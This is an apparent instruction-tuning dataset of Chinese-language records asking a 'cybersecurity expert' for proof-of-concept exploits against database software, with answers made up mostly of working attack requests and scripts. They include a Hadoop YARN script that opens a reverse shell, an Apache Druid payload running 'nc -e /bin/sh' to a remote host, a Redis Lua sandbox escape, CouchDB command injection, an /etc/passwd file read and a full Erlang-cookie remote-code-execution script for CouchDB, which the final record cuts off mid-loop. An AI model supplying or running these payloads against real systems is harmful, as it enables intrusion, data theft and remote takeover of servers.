  465. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenTSDB 命令注入漏洞 CVE-2020-35476\n漏洞描述:OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。在其 2.4.0 版本及之前,存在一处命令注入漏洞。 参考链接: - [OpenTSDB/opentsdb#2051](https://github.com/OpenTSDB/opentsdb/issues/2051) - [https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html)\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2020-35476\n【POC利用方法】\n1. docker compose up -d\n2. POST /api/put/ HTTP/1.1\nHost: your-ip:4242\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\nConnection: close\nContent-Length: 150\n\n{\n    \"metric\": \"sys.cpu.nice\",\n    \"timestamp\": 1346846400,\n    \"value\": 20,\n    \"tags\": {\n       \"host\": \"web01\",\n       \"dc\": \"lga\"\n    }\n}\n3. GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1\nHost: your-ip:4242\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/OpenTSDB 命令注入漏洞 CVE-2020-35476.md"}
    466. 

  466. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Redis 4.x/5.x 未授权访问漏洞\n漏洞描述:Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 参考链接: - https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. $ cd RedisModulesSDK/\n$ make\n$ python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c \"id\"\n3. 使用如下POC即可直接执行命令https://github.com/vulhub/redis-rogue-getshell:\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Redis 4.x5.x 未授权访问漏洞.md"}
    467. 

  467. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Hadoop YARN ResourceManager 未授权访问\n漏洞描述:- 参考阅读: [http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf](http://archive.hack.lu/2016/Wavestone - Hack.lu 2016 - Hadoop safari - Hunting for vulnerabilities - v1.0.pdf)\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. #!/usr/bin/env python\n\nimport requests\n\ntarget = 'http://127.0.0.1:8088/'\nlhost = '192.168.0.1' # put your local host ip here, and listen at port 9999\n\nurl = target + 'ws/v1/cluster/apps/new-application'\nresp = requests.post(url)\napp_id = resp.json()['application-id']\nurl = target + 'ws/v1/cluster/apps'\ndata = {\n    'application-id': app_id,\n    'application-name': 'get-shell',\n    'am-container-spec': {\n        'commands': {\n            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,\n        },\n    },\n    'application-type': 'YARN',\n}\nrequests.post(url, json=data)\n3. url = target + 'ws/v1/cluster/apps'\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Hadoop YARN ResourceManager 未授权访问.md"}
    468. 

  468. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Redis Lua 沙盒绕过命令执行 CVE-2022-0543\n漏洞描述:Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象`package`,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 参考链接: - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2022-0543\n【POC利用方法】\n1. docker-compose up -d\n2. local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\");\nlocal io = io_l();\nlocal f = io.popen(\"id\", \"r\");\nlocal res = f:read(\"*a\");\nf:close();\nreturn res\n3. eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"id\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Redis Lua 沙盒绕过命令执行 CVE-2022-0543.md"}
    469. 

  469. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Druid 远程代码执行漏洞 CVE-2021-25646\n漏洞描述:Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。 参考链接: * https://github.com/apache/druid/issues/2434 * https://forum.ywhack.com/thread-115083-1-1.html * https://druid.apache.org/docs/latest/operations/api-reference.html#broker * https://lists.apache.org/thread.html/r20e0c3b10ae2c05a3aad40f1476713c45bdefc32c920b9986b941d8f@%3Cannounce.apache.org%3E * https://www.o2oxy.cn/3090.html\n影响版本:``` Apache Druid < 0.20.1 ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2021-25646\n【POC利用方法】\n1. Apache Druid < 0.20.1\n2. POST /druid/indexer/v1/sampler HTTP/1.1\nHost: xxx.xxx.xxx.xxx:8888\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: application/json, text/plain, */*\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nContent-Type: application/json\nContent-Length: 995\nConnection: close\n\n\n{\"type\": \"index\", \"spec\": {\"ioConfig\": {\"type\": \"index\", \"inputSource\": {\"type\": \"inline\", \"data\": \"{\\\"isRobot\\\":true,\\\"channel\\\":\\\"#x\\\",\\\"timestamp\\\":\\\"2021-2-1T14:12:24.050Z\\\",\\\"flags\\\":\\\"x\\\",\\\"isUnpatrolled\\\":false,\\\"page\\\":\\\"1\\\",\\\"diffUrl\\\":\\\"https://xxx.com\\\",\\\"added\\\":1,\\\"comment\\\":\\\"Botskapande Indonesien omdirigering\\\",\\\"commentLength\\\":35,\\\"isNew\\\":true,\\\"isMinor\\\":false,\\\"delta\\\":31,\\\"isAnonymous\\\":true,\\\"user\\\":\\\"Lsjbot\\\",\\\"deltaBucket\\\":0,\\\"deleted\\\":0,\\\"namespace\\\":\\\"Main\\\"}\"}, \"inputFormat\": {\"type\": \"json\", \"keepNullColumns\": true}}, \"dataSchema\": {\"dataSource\": \"sample\", \"timestampSpec\": {\"column\": \"timestamp\", \"format\": \"iso\"}, \"dimensionsSpec\": {}, \"transformSpec\": {\"transforms\": [], \"filter\": {\"type\": \"javascript\", \"dimension\": \"added\", \"function\": \"function(value) {java.lang.Runtime.getRuntime().exec('ping xxxxx.dnslog.cn')}\", \"\": {\"enabled\": true}}}}, \"type\": \"index\", \"tuningConfig\": {\"type\": \"index\"}}, \"samplerConfig\": {\"numRows\": 500, \"timeoutMs\": 15000}}\n3. POST /druid/indexer/v1/sampler HTTP/1.1\nHost: xxx.xxx.xxx.xxx:8888\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: application/json, text/plain, */*\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nContent-Type: application/json\nContent-Length: 1008\nConnection: close\n\n\n{\"type\": \"index\", \"spec\": {\"ioConfig\": {\"type\": \"index\", \"inputSource\": {\"type\": \"inline\", \"data\": \"{\\\"isRobot\\\":true,\\\"channel\\\":\\\"#x\\\",\\\"timestamp\\\":\\\"2021-2-1T14:12:24.050Z\\\",\\\"flags\\\":\\\"x\\\",\\\"isUnpatrolled\\\":false,\\\"page\\\":\\\"1\\\",\\\"diffUrl\\\":\\\"https://xxx.com\\\",\\\"added\\\":1,\\\"comment\\\":\\\"Botskapande Indonesien omdirigering\\\",\\\"commentLength\\\":35,\\\"isNew\\\":true,\\\"isMinor\\\":false,\\\"delta\\\":31,\\\"isAnonymous\\\":true,\\\"user\\\":\\\"Lsjbot\\\",\\\"deltaBucket\\\":0,\\\"deleted\\\":0,\\\"namespace\\\":\\\"Main\\\"}\"}, \"inputFormat\": {\"type\": \"json\", \"keepNullColumns\": true}}, \"dataSchema\": {\"dataSource\": \"sample\", \"timestampSpec\": {\"column\": \"timestamp\", \"format\": \"iso\"}, \"dimensionsSpec\": {}, \"transformSpec\": {\"transforms\": [], \"filter\": {\"type\": \"javascript\", \"dimension\": \"added\", \"function\": \"function(value) {java.lang.Runtime.getRuntime().exec(' nc xxx.xxx.xxx.xxx 9999 -e /bin/sh')}\", \"\": {\"enabled\": true}}}}, \"type\": \"index\", \"tuningConfig\": {\"type\": \"index\"}}, \"samplerConfig\": {\"numRows\": 500, \"timeoutMs\": 15000}}\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md"}
    470. 

  470. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635\n漏洞描述:Apache CouchDB是一个开源数据库,专注于易用性和成为\"完全拥抱web的数据库\"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。 参考链接: - http://bobao.360.cn/learning/detail/4716.html - https://justi.cz/security/2017/11/14/couchdb-rce-npm.html\n影响版本:``` Couchdb 小于 1.7.0 以及 小于 2.1.1 ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2017-12635\n【POC利用方法】\n1. Couchdb 小于 1.7.0 以及 小于 2.1.1\n2. docker-compose build\ndocker-compose up -d\n3. ┌──(root💀kali)-[/home/…/vulnerability/vulhub/couchdb/CVE-2017-12635]\n└─# cat init.sh\n#!/bin/bash\n\nCOUCHDB_URL=${COUCHDB_URL:-\"couchdb:5984\"}\nCOUCHDB_AUTH=${COUCHDB_AUTH:-\"admin:password\"}\n\nwhile ! curl -m 5 \"${COUCHDB_URL}\"; do\n    sleep 1\ndone\n\ncurl -X PUT http://${COUCHDB_AUTH}@${COUCHDB_URL}/_users\ncurl -X PUT http://${COUCHDB_AUTH}@${COUCHDB_URL}/_replicator\ncurl -X PUT http://${COUCHDB_AUTH}@${COUCHDB_URL}/_global_changes\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635.md"}
    471. 

  471. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427\n漏洞描述:CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。本漏洞:1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。 参考阅读: - http://cb.drops.wiki/drops/papers-5107.html - http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/ - https://github.com/XiphosResearch/exploits - http://cb.drops.wiki/drops/papers-5142.html **Groovy语言“沙盒”** ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本,但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法: 1. 既然对执行Java代码有沙盒,lupin的方法是想办法绕过沙盒,比如使用Java反射 2. Groovy原本也是一门语言,于是tang3另辟蹊径,使用Groovy语言支持的方法,来直接执行命令,无需使用Java语言 所以,根据这两种执行漏洞的思路,我们可以获得两个不同的POC。 Java沙盒绕过法: ``` java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText() ``` Goovy直接执行命令法: ``` def command='id';def res=command.execute().text;res ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2015-1427\n【POC利用方法】\n1. java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()\n2. def command='id';def res=command.execute().text;res\n3. POST /website/blog/ HTTP/1.1\nHost: 192.168.44.132:9200\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 25\n\n{\n  \"name\": \"test\"\n}\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/ElasticSearch Groovy 沙盒绕过 & 代码执行漏洞 CVE-2015-1427.md"}
    472. 

  472. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenTSDB 命令注入漏洞 CVE-2023-25826\n漏洞描述:OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。 2.4.1 版本及之前,存在一处命令注入漏洞。 这个漏洞其实是对之前的 CVE-2020-35476 修复不完善导致的,所以整个复现过程也与之前类似。 参考链接: - [https://www.synopsys.com/blogs/software-security/opentsdb/](https://www.synopsys.com/blogs/software-security/opentsdb/) - [OpenTSDB/opentsdb#2275](https://github.com/OpenTSDB/opentsdb/pull/2275)\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2023-25826\n【POC利用方法】\n1. docker-compose up -d\n2. POST /api/put/ HTTP/1.1\nHost: your-ip:4242\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\nConnection: close\nContent-Length: 150\n\n{\n    \"metric\": \"sys.cpu.nice\",\n    \"timestamp\": 972388800,\n    \"value\": 20,\n    \"tags\": {\n       \"host\": \"web01\",\n       \"dc\": \"lga\"\n    }\n}\n3. GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1\nHost: your-ip:4242\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/OpenTSDB 命令注入漏洞 CVE-2023-25826.md"}
    473. 

  473. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache CouchDB 任意命令执行漏洞 CVE-2017-12636\n漏洞描述:Apache CouchDB是一个开源数据库,专注于易用性和成为\"完全拥抱web的数据库\"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置`query_server`,这个配置项在设计、执行view的时候将被运行。 参考链接: - http://bobao.360.cn/learning/detail/4716.html - https://justi.cz/security/2017/11/14/couchdb-rce-npm.html\n影响版本:``` Couchdb 小于 1.7.0 以及 小于 2.1.1 ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2017-12636\n【POC利用方法】\n1. Couchdb 小于 1.7.0 以及 小于 2.1.1\n2. docker-compose up -d\n3. curl -X PUT 'http://vulhub:vulhub@your-ip:5984/_config/query_servers/cmd' -d '\"id >/tmp/success\"'\ncurl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest'\ncurl -X PUT 'http://vulhub:vulhub@your-ip:5984/vultest/vul' -d '{\"_id\":\"770895a97726d5ca6d70a22173005c7b\"}'\ncurl -X POST 'http://vulhub:vulhub@your-ip:5984/vultest/_temp_view?limit=10' -d '{\"language\":\"cmd\",\"map\":\"\"}' -H 'Content-Type:application/json'\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Apache CouchDB 任意命令执行漏洞 CVE-2017-12636.md"}
    474. 

  474. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ClickHouse API 数据库接口未授权访问漏洞\n漏洞描述:ClickHouse API 数据库接口存在未授权访问漏洞,攻击者通过漏洞可以执行任意SQL命令获取数据库数据\n影响版本:``` ClickHouse ```\n网络测绘:``` \"ClickHouse\" && body=\"ok\" ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【POC利用方法】\n1. \"ClickHouse\" && body=\"ok\"\n2. http://your-ip:8123/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical\n3. http://your-ip:8123/?query=SHOW%20DATABASES\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/ClickHouse API 数据库接口未授权访问漏洞.md"}
    475. 

  475. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MySQL 身份认证绕过漏洞 CVE-2012-2122\n漏洞描述:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。 参考链接: - http://www.freebuf.com/vuls/3815.html - https://blog.rapid7.com/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql/\n影响版本:``` MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 MySQL 5.1.63, 5.5.24, 5.6.6 ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2012-2122\n【POC利用方法】\n1. MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23\nMySQL 5.1.63, 5.5.24, 5.6.6\n2. docker-compose up -d\n3. for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/MySQL 身份认证绕过漏洞 CVE-2012-2122.md"}
    476. 

  476. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Druid 远程代码执行漏洞 CVE-2021-26919\n漏洞描述:Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。2021年3月30日,Apache Druid官方发布安全更新,修复了 CVE-2021-26919 Apache Druid 远程代码执行漏洞。由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。 参考链接: * http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ * https://help.aliyun.com/noticelist/articleid/1060822985.html\n影响版本:``` Apache Druid < 0.20.2 ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2021-26919\n【POC利用方法】\n1. Apache Druid < 0.20.2\n2. url = \"jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&maxAllowedPacket=65535\"\nuser =\"cb1\"\npassword=\"password\"\n3. * http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-26919.md"}
    477. 

  477. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PostgreSQL 高权限命令执行漏洞 CVE-2019-9193\n漏洞描述:PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 参考链接: - https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2019-9193\n【POC利用方法】\n1. docker-compose up -d\n2. psql --host your-ip --username postgres\n3. DROP TABLE IF EXISTS cmd_exec;\nCREATE TABLE cmd_exec(cmd_output text);\nCOPY cmd_exec FROM PROGRAM 'id';\nSELECT * FROM cmd_exec;\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/PostgreSQL 高权限命令执行漏洞 CVE-2019-9193.md"}
    478. 

  478. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749\n漏洞描述:由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。\n影响版本:``` Apache Druid ```\n网络测绘:``` title=\"Apache Druid\" ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2021-36749\n【POC利用方法】\n1. Apache Druid\n2. title=\"Apache Druid\"\n3. POST /druid/indexer/v1/sampler?for=connect\nAccept: application/json, text/plain, */*\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"inputSource\":{\"type\":\"http\",\"uris\":[\"file:///etc/passwd\"]},\"inputFormat\":{\"type\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"raw\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"1970-01-01T00:00:00Z\"},\"dimensionsSpec\":{}},\"tuningConfig\":{\"type\":\"index\"}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n", "category": "poc_database_vulnerability", "source": "awesome_poc_dataset", "file_path": "数据库漏洞/Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749.md"}
    479. 

  479. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache CouchDB epmd 远程命令执行漏洞 CVE-2022-24706\n漏洞描述:Apache CouchDB 是一个开源的无缝多主同步数据库,使用直观的HTTP/JSON API,并为可靠性而设计。 4月26日,Apache发布安全公告,公开了Apache CouchDB中的一个远程代码执行漏洞(CVE-2022-24706)。在3.2.2 版本之前的 Apache CouchDB 中,可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限\n影响版本:``` CouchDB <= 3.2.1 ```\n网络测绘:``` port=\"4369\" && \"couchdb\" ```\n", "input": "", "output": "【漏洞类型】database_vulnerability\n【CVE编号】CVE-2022-24706\n【POC利用方法】\n1. CouchDB <= 3.2.1\n2. port=\"4369\" && \"couchdb\"\n3. # Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)\n# Date: 2022-01-21\n# Exploit Author: Konstantin Burov, @_sadshade\n# Software Link: https://couchdb.apache.org/\n# Version: 3.2.1 and below\n# Tested on: Kali 2021.2\n# Based on 1F98D's Erlang Cookie - Remote Code Execution\n# Shodan: port:4369 \"name couchdb at\"\n# CVE: CVE-2022-24706\n# References:\n#  https://habr.com/ru/post/661195/\n#  https://www.exploit-db.com/exploits/49418\n#  https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/\n#  https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce\n# \n#\n#!/usr/local/bin/python3\n\nimport socket\nfrom hashlib import md5\nimport struct\nimport sys\nimport re\nimport time\n\nTARGET = \"\"\nEPMD_PORT = 4369 # Default Erlang distributed port\nCOOKIE = \"monster\" # Default Erlang cookie for CouchDB \nERLNAG_PORT = 0\nEPM_NAME_CMD = b\"\\x00\\x01\\x6e\" # Request for nodes list\n\n# Some data:\nNAME_MSG  = b\"\\x00\\x15n\\x00\\x07\\x00\\x03\\x49\\x9cAAAAAA@AAAAAAA\"\nCHALLENGE_REPLY = b\"\\x00\\x15r\\x01\\x02\\x03\\x04\"\nCTRL_DATA  = b\"\\x83h\\x04a\\x06gw\\x0eAAAAAA@AAAAAAA\\x00\\x00\\x00\\x03\"\nCTRL_DATA += b\"\\x00\\x00\\x00\\x00\\x00w\\x00w\\x03rex\"\n\n\ndef compile_cmd(CMD):\n    MSG  = b\"\\x83h\\x02gw\\x0eAAAAAA@AAAAAAA\\x00\\x00\\x00\\x03\\x00\\x00\\x00\"\n    MSG += b\"\\x00\\x00h\\x05w\\x04callw\\x02osw\\x03cmdl\\x00\\x00\\x00\\x01k\"\n    MSG += struct.pack(\">H\", len(CMD))\n    MSG += bytes(CMD, 'ascii')\n    MSG += b'jw\\x04user'\n    PAYLOAD = b'\\x70' + CTRL_DATA + MSG\n    PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD\n    return PAYLOAD\n\nprint(\"Remote Command Execution via Erlang Distribution Protocol.\\n\")\n\nwhile not TARGET:\n    TARGET = input(\"Enter target host:\\n> \")\n\n# Connect to EPMD:\ntry:\n    epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    epm_socket.connect((TARGET, EPMD_PORT))\nexcept socket.error as msg:\n    print(\"Couldnt connect to EPMD: %s\\n terminating program\" % msg)\n    sys.exit(1)\n    \nepm_socket.send(EPM_NAME_CMD) #request Erlang nodes\nif epm_socket.recv(4) == b'\\x00\\x00\\x11\\x11': # OK\n    data = epm_socket.recv(1024)\n    data = data[0:len(data) - 1].decode('ascii')\n    data = data.split(\"\\n\")\n    if len(data) == 1:\n        choise = 1\n        print(\"Found \" + data[0])\n    else:\n        print(\"\\nMore than one node found, choose which one to use:\")\n        line_number = 0\n        for line in data:\n            line_number += 1\n            print(\" %d) %s\" %(line_number, line))\n        choise = int(input(\"\\n> \"))\n        \n    ERLNAG_PORT = int(re.search(\"\\d+$\",data[choise - 1])[0])\nelse:\n    print(\"Node list request error, exiting\")\n    sys.exit(1)\nepm_socket.close()\n\n# Connect to Erlang port:\ntry:\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((TARGET, ERLNAG_PORT))\nexcept socket.error as msg:\n    print(\"Couldnt connect to Erlang server: %s\\n terminating program\" % msg)\n    sys.exit(1)\n   \ns.send(NAME_MSG)\ns.recv(5)                    # Receive \"ok\" message\nchallenge = s.recv(1024)     # Receive \"challenge\" message\nchallenge = struct.unpack(\">I\", challenge[9:13])[0]\n\n#print(\"Extracted challenge: {}\".format(challenge))\n\n# Add Challenge Digest\nCHALLENGE_REPLY += md5(bytes(COOKIE, \"ascii\")\n    + bytes(str(challenge), \"ascii\")).digest()\ns.send(CHALLENGE_REPLY)\nCHALLENGE_RESPONSE = s.recv(1024)\n\nif len(CHALLENGE_RESPONSE) == 0:\n    print(\"Authentication failed, exiting\")\n    sys.exit(1)\n\nprint(\"Authentication successful\")\nprint(\"Enter command:\\n\")\n\ndata_size = 0\nwhile True:\n    if data_size <= 0:\n        CMD = input(\"> \")\n        if not CMD:\n            continue\n        elif CMD == \"exit\":\n            sys.exit(0)\n        s.send(compile_cmd(CMD))\n        data_size = struct.unpack(\">I\", s.recv(4))[0] # Get data size\n        s.recv(45)              # Control message\n        data_size -= 45         # Data size without control message\n        time.sleep(0.1)\n    elif data_size < 1024:        \n        data = s.recv(data_size)\n        #print(\"S---data_size: %d, data_recv_size: %d\" %(data_size,len(data)))\n        time.sleep(0.1)\n        print(data.decode())\n        data_size = 0\n    else:        \n        data = s.recv(1024)\n      